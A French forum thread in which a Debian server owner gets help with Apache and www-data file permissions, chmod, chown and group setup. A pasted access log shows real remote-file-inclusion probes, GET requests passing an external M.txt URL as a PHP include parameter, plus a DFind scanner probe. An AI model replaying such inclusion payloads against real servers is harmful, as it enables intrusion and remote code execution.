Help pour permissions et groups svp

Bonjour,

Voilà je me prend la tête avec les permissions depuis une bonne semaine et j’en peut plus

J’vous explique, actuellement j’ai un hébergeur et tout marche correctement chez lui, j’aimerai copier sa façon de faire, alors je me dit que si c’est possible sur son serveur pourquoi je n’arriverai pas sur le mien. Pour ma part j’ai pris un serveur Dedibox configuré en Debian.

Ma configuration est la suivante, j’ai un dossier /var/www/monsite, qui contient tous mes fichiers ( php, html, js, htaccess, etc… ) Le propriétaire du répertoire entier est Zubaran, les droits sont en chmod 755 pour les dossiers et chmod 644 pour tous les fichiers. Le groupe original qui accède à mon site est www-data ( dans httpd.conf : groups www-data, user www-data ), c’est lui qui accède au site et je souhaites que ce ne soit que lui.

Mon problème est le suivant, le group et l’user www-data n’a bien sûr pas la permission d’écrire, pourtant je souhaite pouvoir envoyer des fichiers depuis le site grâce à du php ( move_upload_files ) ainsi que faire des includes, compteurs etc… Mais bien sûr j’ai droit à des Permission Denied.

Je vois plusieurs solutions possible mais question sécurité je risque d’avoir des soucis.
1) je met tous mes chmod en 775 pour que www-data puisse écrire et zubaran ( le propriétaire des fichiers ) lui aussi, mais tout le monde peut me bidouiller le site, n’est-ce pas ?
2) www-data devient le propriétaire des fichiers, dans ce cas je n’ai pas a changer les chmods mais cela revient au même.

Qu’en pensez-vous ? Comment être au même point qu’un hébergeur où l’on ne se pose pas ce genre de question. Je voudrai que mon propriétaire Zubaran puisse accéder au FTP et faire ce qui lui chante, que mon www-data soit le groupe de mon site, puisse y accéder et ne soit confronté à aucun Permission Denied sans pour autant qu’il est tous les droits.

Je nage dans le flou, ces permissions me rendent fou, aidez vois svp

Tu te rajoutes dans le groupe www-data et tu mets tout en 770 et 760 et tu devrais être tranquille.

Salut ripat et merci pour ta réponse.

Si je fais ce que tu me dit, question sécurité cela pose t’il un quelconque problème ?

Bon je sais pas ce que j’ai fait mais j’ai fais une bêtise, je n’arrive plus à me connecter à phpmyadmin, permission denied. Je me suis embrouillé total, ca me saoule j’en peut plus. J’ai installé Webmin pour esayer de gérer les groupes et voilà le résultat

Je cherche désespérément quelqu’un qui pourrait tout me remettre à plat

Non pas trop de problème de sécurité. Seuls www-data (propriétaire) et les membres de son groupe y ont accès. Les autres ne peuvent rien y faire.

Pour les perm que donne:

egrep 'www-data|ton_user' /etc/group

Pour phpmyadmin, que donne:

En premier, merci pour ta réponse.

Le egrep 'www-data|ton_user' /etc/group donne :

www-data:x:33:
zubaran:x:1000:

Le $ls -l /var/www/phpmy* donne :

lrwxrwxrwx 1 root root 21 2008-06-01 09:05 /var/www/abandonware-paradise/phpmyadmin -> /usr/share/phpmyadmin

Tu accèdes toujours à d’autres pages web? Quelles sont les perm sur /var/www/ ?

Le résultat donne ceci :

drwxrwxrwx 5 root root 4096 2008-06-01 08:09 .
drwxr-xr-x 15 root root 4096 2008-06-01 07:48 …
drwxr-xr-x 26 zubaran zubaran 12288 2008-06-01 09:05 abandonware-paradise
drwxr-xr-x 2 root root 4096 2008-05-23 15:55 apache2-default
-rw-r–r-- 1 zubaran zubaran 3331 2008-06-01 08:09 .htaccess
drwxr-xr-x 2 zubaran zubaran 4096 2008-06-01 07:37 Webmin

Oui je peut accéder aux pages webs.

Souhaite tu que je t’envoie l’url de mon serv en pm ou par email pour que tu constate directement ce qui s’y passe ?

Merci bcp de ton aide.

Rien d’anormal à première vue. Faudrait voir ce que disent les log. dans une fenêtre, fais:

Puis essaye d’accéder aux pages qui posent problème et poste ici les lignes du log.

Ensuite dans le fichier /etc/group, ajoute-toi dans le groupe www-data:

www-data:x:33:zubaran zubaran:x:1000:

Que donne ls -la /usr/share/phpmyadmin Poste le résultat et ensuite, fais un chmod 770 sur les répertoires de /var/www et un chmod 660 sur les fichiers. Pour phpmyadmin remets 777 sur le lien symbolique.

Dernière chose, renomme ton .htaccess pour voir si c’est pas lui qui bloque l’accès.

Essaye déjà ça pour voir. Si nécessaire je regarderai de plus près demain en journée. Passe moi ton url en MP. Mais sans accès ssh je ne pourrai pas faire grand chose.

Salut et encore merci pour ton aide!

Voici ce que dit le log ( c’est normal tout ça ? ):

[quote]207.88.140.90 - - [02/Jun/2008:12:07:53 +0200] “GET /zipndownload.php?PP_PATH=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:53 +0200] “GET /sources/functions.php?CONFIG[main_path]=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:53 +0200] “GET /dbase.php?action=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:54 +0200] “GET /experts.php?sub=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:54 +0200] “GET /index1.php?p=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:55 +0200] “GET /index2.php?arq=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:55 +0200] “GET /index2.php?c=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:56 +0200] “GET /tools/send_reminders.php?includedir=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
207.88.140.90 - - [02/Jun/2008:12:07:56 +0200] “GET /classes/adodbt/sql.php?classes_dir=http://www.jokel-net.de/M.txt?&/ HTTP/1.1” 302 325 “-” "Veritas Fucking Scanner"
80.95.121.173 - - [02/Jun/2008:12:11:29 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 318 “-” “-”
[/quote]

Voici ce que donne le ls -la /usr/share/phpmyadmin :

Y-a-t’il un moyen de faire un chmod pour tous les répertoires ou je suis obligé de les changer un par un ? Pour les fichiers j’ai fais un chmod -R mais même le chmod des répertoires sont changés donc je dois me les refaire un par un ?

J’ai donc fait tout ce que tu ma dit même le htaccess et cette fois-ci je ne peut plus du tout accéder au site :
You don’t have permission to access / on this server
You don’t have permission to access /phpmyadmin/ on this server.

S’il faut je peut te donner accès au SSH, je suis tellement démotivé

Après avoir fait un [quote]chown -R www-data:zubaran /var/www/abandonware-paradise/[/quote]

Je peut de nouveau accéder a phpmyadmin et au site. Tout a l’air Ok, sauf qu’il me reste à remodifier le chmod de tous mes répertoires a moins qu’il existe une manip pour les faire tous d’un coup.

J’attend ton prochain message avant de toucher quoi que ce soit

Je ne connais pas d’option de chmod qui permette de traiter sélectivement et récursivement répertoires et fichiers.

Pour changer les perm récursivement sur les directories uniquement:

Si, à l’avenir tu ne veux changer que les per de fichiers, même chose:

ATTENTION! Ne mets pas la racine / de ta partition après le find sinon, tu changeras tous tes répertoires ou fichiers!

Merci beaucoup tout est ok maintenant, mis à part que sur mon FTP je ne peut pas créer ni effacer de répertoire mais bon c’est pas grave je ferai avec.

Ripat tu as été super cool, encore merci

Ça devrait se régler dans le fichier de config du deamon FTP. Ouvre un nouveau fil sur le sujet si nécessaire.

Ok merci, pourtant j’avais bien configuré Proftpd. A bientôt ripat